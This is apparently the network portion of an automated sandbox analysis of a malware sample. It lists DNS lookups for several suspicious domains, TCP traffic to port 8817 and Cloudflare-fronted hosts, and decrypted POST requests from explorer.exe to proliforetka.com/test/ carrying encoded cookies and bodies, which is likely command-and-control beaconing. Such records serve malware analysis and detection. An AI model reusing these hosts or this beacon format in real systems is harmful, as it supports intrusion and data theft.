                                                                                                                                Dec 17, 2024 17:58:46.802009106 CET44350040172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:46.802046061 CET50040443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:46.810416937 CET50040443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:46.814423084 CET50040443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:46.814438105 CET44350040172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:47.305218935 CET50041443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:47.305262089 CET44350041172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:47.305465937 CET50041443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:47.306005955 CET50041443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:47.306025028 CET44350041172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:47.309449911 CET498438817192.168.2.694.232.40.41
                                                                                                                                Dec 17, 2024 17:58:47.309711933 CET499528817192.168.2.694.232.46.11
                                                                                                                                Dec 17, 2024 17:58:47.429383993 CET88174984394.232.40.41192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:47.429625988 CET88174995294.232.46.11192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:48.572361946 CET44350041172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:48.572493076 CET50041443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:48.573059082 CET50041443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:48.573069096 CET44350041172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:48.574841022 CET50041443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:48.574846029 CET44350041172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:49.314546108 CET44350041172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:49.314621925 CET44350041172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:49.314641953 CET50041443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:49.318546057 CET50041443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:49.318648100 CET50041443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:49.318664074 CET44350041172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:49.402411938 CET50042443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:49.402441978 CET44350042172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:49.402620077 CET50042443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:49.403079987 CET50042443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:49.403090954 CET44350042172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:49.949768066 CET497338817192.168.2.694.232.46.11
                                                                                                                                Dec 17, 2024 17:58:50.774478912 CET44350042172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:50.776772022 CET50042443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:50.778570890 CET50042443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:50.778570890 CET50042443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:50.778578997 CET44350042172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:50.778594971 CET44350042172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:51.486824989 CET44350042172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:51.486913919 CET44350042172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:51.486943960 CET50042443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:51.486983061 CET50042443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:51.487502098 CET50042443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:51.487519026 CET44350042172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:51.581815958 CET50043443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:51.581859112 CET44350043172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:51.581996918 CET50043443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:51.584578991 CET50043443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:51.584594965 CET44350043172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:52.798644066 CET44350043172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:52.798751116 CET50043443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:52.799355030 CET50043443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:52.799360991 CET44350043172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:52.800899029 CET50043443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:52.800905943 CET44350043172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:53.536463022 CET44350043172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:53.536951065 CET50043443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:53.536977053 CET44350043172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:53.540640116 CET50043443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:53.542221069 CET44350043172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:53.542284012 CET44350043172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:53.542403936 CET50043443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:53.542433977 CET50043443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:53.542433977 CET50043443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:53.542449951 CET44350043172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:53.542601109 CET50043443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:53.589862108 CET50044443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:53.589907885 CET44350044172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:53.592765093 CET50044443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:53.596483946 CET50044443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:53.596503019 CET44350044172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:55.122675896 CET44350044172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:55.123717070 CET50044443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:55.138436079 CET50044443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:55.138452053 CET44350044172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:55.142015934 CET50044443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:55.142029047 CET44350044172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:55.905644894 CET44350044172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:55.905726910 CET50044443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:55.905750036 CET44350044172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:55.905829906 CET50044443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:55.905836105 CET44350044172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:55.905877113 CET50044443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:55.905895948 CET44350044172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:55.905966997 CET50044443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:55.906122923 CET50044443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:55.906136036 CET44350044172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:55.970822096 CET50045443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:55.970863104 CET44350045172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:55.970980883 CET50045443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:55.971275091 CET50045443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:55.971292019 CET44350045172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:57.231352091 CET44350045172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:57.231538057 CET50045443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:57.233197927 CET50045443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:57.233197927 CET50045443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:57.233222008 CET44350045172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:57.233246088 CET44350045172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:57.984832048 CET44350045172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:57.985017061 CET50045443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:57.985059023 CET44350045172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:57.985112906 CET50045443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:57.985115051 CET44350045172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:57.985162973 CET50045443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:58.007528067 CET50045443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:58.007572889 CET44350045172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:58.518246889 CET50046443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:58.518296003 CET44350046172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:58.518381119 CET50046443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:58.518672943 CET50046443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:58.518682957 CET44350046172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:59.753266096 CET44350046172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:59.753329992 CET50046443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:59.754090071 CET50046443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:59.754101038 CET44350046172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:59.756243944 CET50046443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:59.756252050 CET44350046172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:00.732199907 CET44350046172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:00.732479095 CET44350046172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:00.736578941 CET50046443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:00.780503988 CET50046443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:00.780536890 CET44350046172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:01.182480097 CET50047443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:01.182529926 CET44350047172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:01.182902098 CET50047443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:01.183339119 CET50047443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:01.183356047 CET44350047172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:02.562967062 CET44350047172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:02.563071966 CET50047443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:02.563762903 CET50047443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:02.563776970 CET44350047172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:02.566167116 CET50047443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:02.566181898 CET44350047172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:03.243491888 CET44350047172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:03.243577003 CET50047443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:03.243618965 CET44350047172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:03.243639946 CET44350047172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:03.243751049 CET50047443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:03.245599985 CET50047443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:03.245615005 CET44350047172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:03.373965025 CET50048443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:03.374032021 CET44350048172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:03.374320030 CET50048443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:03.375021935 CET50048443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:03.375040054 CET44350048172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:04.593728065 CET44350048172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:04.593816042 CET50048443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:04.594288111 CET50048443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:04.594301939 CET44350048172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:04.595927954 CET50048443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:04.595937014 CET44350048172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:05.286158085 CET44350048172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:05.286266088 CET50048443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:05.286294937 CET44350048172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:05.286585093 CET50048443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:05.286680937 CET44350048172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:05.286739111 CET44350048172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:05.286768913 CET50048443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:05.286911011 CET50048443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:05.287121058 CET50048443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:05.287133932 CET44350048172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:05.726254940 CET50049443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:05.726303101 CET44350049172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:05.726365089 CET50049443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:05.726820946 CET50049443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:05.726835966 CET44350049172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:06.964826107 CET44350049172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:06.965173006 CET50049443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:21.761949062 CET44350049172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:21.762017012 CET50049443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:23.422642946 CET88175001194.232.40.41192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:23.430560112 CET500118817192.168.2.694.232.40.41

                                                                                                                                UDP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Dec 17, 2024 17:55:07.339040041 CET6467853192.168.2.61.1.1.1
                                                                                                                                Dec 17, 2024 17:55:08.125819921 CET53646781.1.1.1192.168.2.6
                                                                                                                                Dec 17, 2024 17:56:04.530534029 CET5087053192.168.2.61.1.1.1
                                                                                                                                Dec 17, 2024 17:56:05.528865099 CET5087053192.168.2.61.1.1.1
                                                                                                                                Dec 17, 2024 17:56:05.592211962 CET53508701.1.1.1192.168.2.6
                                                                                                                                Dec 17, 2024 17:56:05.669168949 CET53508701.1.1.1192.168.2.6
                                                                                                                                Dec 17, 2024 17:56:47.948262930 CET6256053192.168.2.61.1.1.1
                                                                                                                                Dec 17, 2024 17:56:48.225836039 CET53625601.1.1.1192.168.2.6
                                                                                                                                Dec 17, 2024 17:56:56.508414984 CET5470153192.168.2.61.1.1.1
                                                                                                                                Dec 17, 2024 17:56:56.827999115 CET53547011.1.1.1192.168.2.6

                                                                                                                                DNS Queries

                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                Dec 17, 2024 17:55:07.339040041 CET192.168.2.61.1.1.10xcaeeStandard query (0)muuxxu.comA (IP address)IN (0x0001)false
                                                                                                                                Dec 17, 2024 17:56:04.530534029 CET192.168.2.61.1.1.10x90e6Standard query (0)cronoze.comA (IP address)IN (0x0001)false
                                                                                                                                Dec 17, 2024 17:56:05.528865099 CET192.168.2.61.1.1.10x90e6Standard query (0)cronoze.comA (IP address)IN (0x0001)false
                                                                                                                                Dec 17, 2024 17:56:47.948262930 CET192.168.2.61.1.1.10x5f45Standard query (0)proliforetka.comA (IP address)IN (0x0001)false
                                                                                                                                Dec 17, 2024 17:56:56.508414984 CET192.168.2.61.1.1.10x8d97Standard query (0)dogirafer.comA (IP address)IN (0x0001)false

                                                                                                                                DNS Answers

                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                Dec 17, 2024 17:55:08.125819921 CET1.1.1.1192.168.2.60xcaeeNo error (0)muuxxu.com94.232.46.11A (IP address)IN (0x0001)false
                                                                                                                                Dec 17, 2024 17:55:20.828512907 CET1.1.1.1192.168.2.60x1eabNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                Dec 17, 2024 17:55:20.828512907 CET1.1.1.1192.168.2.60x1eabNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                Dec 17, 2024 17:56:05.592211962 CET1.1.1.1192.168.2.60x90e6No error (0)cronoze.com94.232.40.41A (IP address)IN (0x0001)false
                                                                                                                                Dec 17, 2024 17:56:05.669168949 CET1.1.1.1192.168.2.60x90e6No error (0)cronoze.com94.232.40.41A (IP address)IN (0x0001)false
                                                                                                                                Dec 17, 2024 17:56:48.225836039 CET1.1.1.1192.168.2.60x5f45No error (0)proliforetka.com172.67.161.60A (IP address)IN (0x0001)false
                                                                                                                                Dec 17, 2024 17:56:48.225836039 CET1.1.1.1192.168.2.60x5f45No error (0)proliforetka.com104.21.41.64A (IP address)IN (0x0001)false
                                                                                                                                Dec 17, 2024 17:56:56.827999115 CET1.1.1.1192.168.2.60x8d97No error (0)dogirafer.com104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                Dec 17, 2024 17:56:56.827999115 CET1.1.1.1192.168.2.60x8d97No error (0)dogirafer.com104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                Dec 17, 2024 17:56:56.827999115 CET1.1.1.1192.168.2.60x8d97No error (0)dogirafer.com104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                Dec 17, 2024 17:56:56.827999115 CET1.1.1.1192.168.2.60x8d97No error (0)dogirafer.com104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                Dec 17, 2024 17:56:56.827999115 CET1.1.1.1192.168.2.60x8d97No error (0)dogirafer.com104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                Dec 17, 2024 17:56:56.827999115 CET1.1.1.1192.168.2.60x8d97No error (0)dogirafer.com104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                Dec 17, 2024 17:56:56.827999115 CET1.1.1.1192.168.2.60x8d97No error (0)dogirafer.com104.21.112.1A (IP address)IN (0x0001)false

                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                • proliforetka.com
                                                                                                                                • dogirafer.com

                                                                                                                                HTTPS Proxied Packets

                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                0192.168.2.649935172.67.161.604434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:56:49 UTC422OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX1MtB7wWZOVm6dxbMApErYHkIrgHPcdkrW3ek7S4VyqTt3UE3hInxs8QLBv+1KAJWQTBDNFxD0J2qpovrJJFzxPO2pL5RTiKelSONlVigVM0+zHw3Cx1xAaPbzLSGgFj/sfURN7nGXOUiFEaGhX9p+NroWtkvLZBaSr470b1XyZIY=
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 92
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:56:49 UTC92OUTData Raw: 69 41 59 2f 63 73 38 5a 36 54 4b 6a 49 4a 35 67 30 7a 6c 42 41 33 4c 49 68 4f 42 64 72 30 50 4b 54 78 34 43 78 44 53 59 55 41 79 4b 6a 73 4a 71 51 49 68 33 72 7a 6c 33 56 46 2f 45 65 53 51 35 72 46 6a 61 2f 62 67 35 56 39 36 55 65 45 37 79 5a 58 4f 5a 46 55 75 44 68 63 51 3d
                                                                                                                                Data Ascii: iAY/cs8Z6TKjIJ5g0zlBA3LIhOBdr0PKTx4CxDSYUAyKjsJqQIh3rzl3VF/EeSQ5rFja/bg5V96UeE7yZXOZFUuDhcQ=
                                                                                                                                2024-12-17 16:56:50 UTC807INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:56:50 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YnlY3yKDuuG4SukhLw6B6GlbyfbZyXWk0vi%2F3VWxlOQBd3LnOBVMd9lxiZcN5Cb69PvI0eyNNScjLcp9bZ88cd9sTuLTNLaoIF9TPhFzGN28Y%2Far0bcVNA6HihHNJ8OuoPSL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3872e08f49423b-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1584&min_rtt=1583&rtt_var=596&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1174&delivery_rate=1834170&cwnd=226&unsent_bytes=0&cid=17f39eb77dedf5fe&ts=881&x=0"
                                                                                                                                2024-12-17 16:56:50 UTC94INData Raw: 35 38 0d 0a 6d 46 78 6e 4a 4d 70 45 76 56 66 78 4c 5a 55 36 69 44 46 44 47 33 72 49 69 4f 39 52 72 30 2b 7a 46 55 4a 61 68 48 48 66 53 58 50 75 33 70 77 37 53 6f 46 37 70 56 52 79 56 30 47 59 4c 33 38 6b 38 41 2f 54 34 71 78 4f 41 65 7a 45 44 45 71 63 45 68 6a 72 4c 68 54 47 0d 0a
                                                                                                                                Data Ascii: 58mFxnJMpEvVfxLZU6iDFDG3rIiO9Rr0+zFUJahHHfSXPu3pw7SoF7pVRyV0GYL38k8A/T4qxOAezEDEqcEhjrLhTG
                                                                                                                                2024-12-17 16:56:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                1192.168.2.649942172.67.161.604434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:56:52 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX0MtB7wWZOVm6dxbMApErYHkIrgHPcdkrW3ek7S4VyqTt3UE3hInxs8QLBv+1KAJWQTBDNFxD0J2qpovrJJFzxPO2pL5RTiKelSONlVigVM0+zHw3Cx1xAaPbzLSGgFj/sfURN7nGXOUiFEaGhX9p+NroWtkvLZBaSr470b1XyZIY=
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:56:53 UTC812INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:56:53 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EBlmoCYM%2BDJ0pL18MJHrFEozFgoEHSTiS4pottdlbviEoFX78enPNWB%2B5tB0pMsocjt23LBsxZ43Kx4GTMEAg5qlKhRCcApDudYTjRXxSPqctziG86Q%2BZc41L%2FsJHDOTjnW0"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3872f3cf9f3a73-FRA
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=92809&min_rtt=92769&rtt_var=34870&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1059&delivery_rate=31365&cwnd=32&unsent_bytes=0&cid=7d00f0fa94bd4346&ts=665&x=0"
                                                                                                                                2024-12-17 16:56:53 UTC54INData Raw: 33 30 0d 0a 6d 31 39 70 4a 4d 4e 4c 76 56 66 7a 49 70 55 30 67 7a 5a 48 47 33 48 4a 69 4f 35 53 72 6b 79 7a 48 6b 52 66 67 6e 66 5a 44 41 4c 70 35 51 3d 3d 0d 0a
                                                                                                                                Data Ascii: 30m19pJMNLvVfzIpU0gzZHG3HJiO5SrkyzHkRfgnfZDALp5Q==
                                                                                                                                2024-12-17 16:56:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                2192.168.2.649947172.67.161.604434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:56:54 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX3MtB7wWZOVm6dxbMApErYHkIrgHPcdkrW3ek7S4VyqTt3UE3hInxs8QLBv+1KAJWQTBDNFxD0J2qpovrJJFzxPO2pL5RTiKelSONlVigVM0+zHw3Cx1xAaPbzLSGgFj/sfURN7nGXOUiFEaGhX9p+NroWtkvLZBaSr470b1XyZIY=
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:56:55 UTC815INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:56:55 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Aa2sbxaGkgDxXGOg9emHhuLzlX50GqbyMzSjJnfduvBmLz6Zn%2Fmer%2FJttujscw4qFAxmJ40w1o2Mj3jklY%2BUL%2BFh39ivKFBJoOzpc9cmY%2FFMxNj3cSQA4%2BbqWmmyQeMb9sXR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f387300ac865e61-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
